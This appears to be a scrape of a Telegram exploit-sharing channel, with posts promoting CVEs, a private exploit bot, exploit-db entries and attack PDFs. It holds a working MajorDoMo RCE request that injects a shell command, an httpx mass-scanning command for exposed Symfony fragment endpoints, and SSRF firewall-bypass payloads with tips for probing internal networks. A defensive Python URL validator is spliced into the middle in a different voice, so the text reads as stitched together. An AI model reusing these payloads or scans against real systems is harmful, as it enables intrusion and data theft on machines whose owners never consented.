CVE-2024-26630
Linux 6.5 Kernel Pointer Leak ❗️
Link
#Cve #linux #Exploit
——————
0Day.Today
@LearnExploit
@Tech_Army
MajorDoMo thumb RCE
GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23 %3B HTTP/1.1
#rce #Poc #Exploit
——————
0Day.Today
@LearnExploit
@Tech_Army
Exploits Symfony
httpx -l hosts.txt -path /_fragment?_path=_controller=phpcredits&flag=-1 -threads 100 -random-agent -x GET -tech-detect -status-code -follow-redirects -title -mc 200 -match-regex "PHP Credits"
Github
#Exploit #RCE
——————
0Day.Today
@LearnExploit
@Tech_Army
Zero Exploiter 🔥 Bot Exploit 💎
Share and subscribe
Made with ❤️
#Priv8 #Exploit
——————
0Day.Today
@LearnExploit
@A3L3_KA4
0Day.Today | Learn Exploit | Zero World | Dark web |
ZeroExploiter.py
4 KB
Exploit Title: ESET NOD32 Antivirus 17.0.16.0 - Unquoted Service Path
Exploit Author: Ex3ptionaL
Exploit Date: 2024-04-01
Vendor: https://www.eset.com
Version: 17.0.16.0
Tested on OS: Microsoft Windows 10 pro x64
🕷 Exploit-db
⬇️ Download
#Exploit #ESET #NOD32
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
📣 T.me/BugCod3
📣 T.me/LernExploit
📣 T.me/A3l3_KA4
SSRF Payloads To Bypass Firewall
Here are 5 payloads that could be used for bypassing defenses when it comes to SSRF (Server-Side Request Forgery):
1) Bypass SSRF with CIDR:
http://127.127.127.127
http://127.0.0.0
2) Bypass using rare address:
http://127.1
http://0
3) Bypass using tricks combination:
http://1.1.1.1 &Q2.2.2.2# @3.3.3.3/ urllib : 3.3.3.3
4) Bypass against a weak parser:
http://127.1.1.1:80\@127.2.2.2:80/
5) Bypass localhost with [:]:
http://[::1:80/
http://0000::1:80/
Let's remind ourselves what SSRF vulnerabilities are and what we can do with them. In general, SSRF allows us to:
Access services on the loopback interface running on the remote server
Scan the internal network and potentially interact with the discovered services
Read local files on the server using the file:// protocol handler
Move laterally / pivot into the internal environment
How to find SSRF? When the target web application allows us to access external resources, e.g. a profile image loaded from an external URL (running on a 3rd party website), we can try to load internal resources accessible by the vulnerable web application.
For example:
We discover that the following URL works:
https://example.com:8000/page?user=&link=https://127.0.0.1:8000
We can then run an Intruder attack (Burp Suite) trying different ports, effectively doing a port scan of the host. We can also try to scan private IPs such as 192.168.x.x and discover live IPs in the internal network.
#SSRF #Bypass #Waf #Firewall #Payload #exploit #Xploit
〰️〰️〰️〰️〰️〰️〰️〰️
IR0Day.Today Bax
@LearnExploit
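The defensive counterpart to the address forms in the post above, as an added example that is not part of the original post: a server-side check that normalises the host the way a C resolver would and rejects anything that is not a public address, instead of matching strings such as "127.0.0.1" or "localhost". The function names and the injectable `resolve` parameter are assumptions made for this sketch.

```python
import ipaddress
import socket
from urllib.parse import urlsplit


def literal_ip(host):
    """Address a C resolver would connect to for a numeric host, else None."""
    try:
        # inet_aton() accepts legacy short/octal/hex forms such as "127.1" and "0"
        return ipaddress.IPv4Address(socket.inet_aton(host))
    except (OSError, ValueError):
        pass
    try:
        return ipaddress.IPv6Address(host)
    except ValueError:
        return None


def is_internal(ip):
    """True for loopback, unspecified, private, link-local and other non-public space."""
    mapped = getattr(ip, "ipv4_mapped", None)  # unwrap ::ffff:a.b.c.d
    return not (mapped if mapped is not None else ip).is_global


def check_fetch_url(url, resolve=socket.getaddrinfo):
    """Return (allowed, reason) for a user-supplied URL the server is about to fetch."""
    # Backslashes and whitespace make URL parsers disagree about the host: reject.
    if any(c.isspace() or c == "\\" for c in url):
        return False, "whitespace or backslash in URL"
    try:
        parts = urlsplit(url)
        host, _port = parts.hostname, parts.port  # .port raises on junk like ":1:80"
    except ValueError as exc:
        return False, f"unparseable URL: {exc}"
    if parts.scheme not in ("http", "https") or not host or parts.username is not None:
        return False, "scheme, host or userinfo not allowed"
    ip = literal_ip(host)
    try:
        # Names are resolved and every returned address is checked, not just the first.
        addrs = [ip] if ip is not None else [
            ipaddress.ip_address(info[4][0]) for info in resolve(host, None)]
    except (OSError, ValueError):
        return False, "host does not resolve"
    if not addrs or any(is_internal(a) for a in addrs):
        return False, f"{host} maps to a non-public address"
    return True, f"{host} -> {addrs[0]}"
```

The fetch itself has to connect to the address that was validated rather than resolving the name a second time, and every redirect hop needs the same check.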
✅ Article introducing and exploiting 4 bugs:
1. path traversal
2. business logic
3. single sign-on (SSO) Misconfiguration
4. Insecure Deserialization
#Article
#Exploit #Xploit #Bugbounty
#Bug #SSRF #CSRF #SSO
➖➖➖➖➖➖➖➖
♨️ IR0Day.Today Bax ♨️
⚠️ @LearnExploit
Article introducing and exploiting 4 bugs.pdf
376.6 KB
#exploit
1. CVE-2024-54887:
TP-Link TL-WR940N BoF
2. CVE-2024-41570:
Authenticated Havoc-Chained-RCE
3. CVE-2025-21298:
Windows OLE RCE (CVSS 9.8)
IR0Day.Today Bax
@LearnExploit
Medium
Reversing, Discovering, And Exploiting A TP-Link Router Vulnerability — CVE-2024–54887
When HarmonyOS gets hacked! Offensive testing of HarmonyOS NEXT apps with Harm0nyz3r
In this presentation, the security of HarmonyOS NEXT is put under the microscope in a practical way: using the dedicated Harm0nyz3r framework and the vulnerable DVHA application, the attack surface of apps is identified and exploits are run live. A realistic look at the threats, the weaknesses and the future of security in the HarmonyOS ecosystem.
⸻
#HarmonyOS
#HarmonyOS_NEXT
#Mobile_Security
#Offensive_Security
#BlackHat2025
#AppSec
#Pentest
#ReverseEngineering
#Exploit
⸻
@LearnExploit
@IR0DayBax
Breaking_Harmony_NEXT.pdf
12.2 MB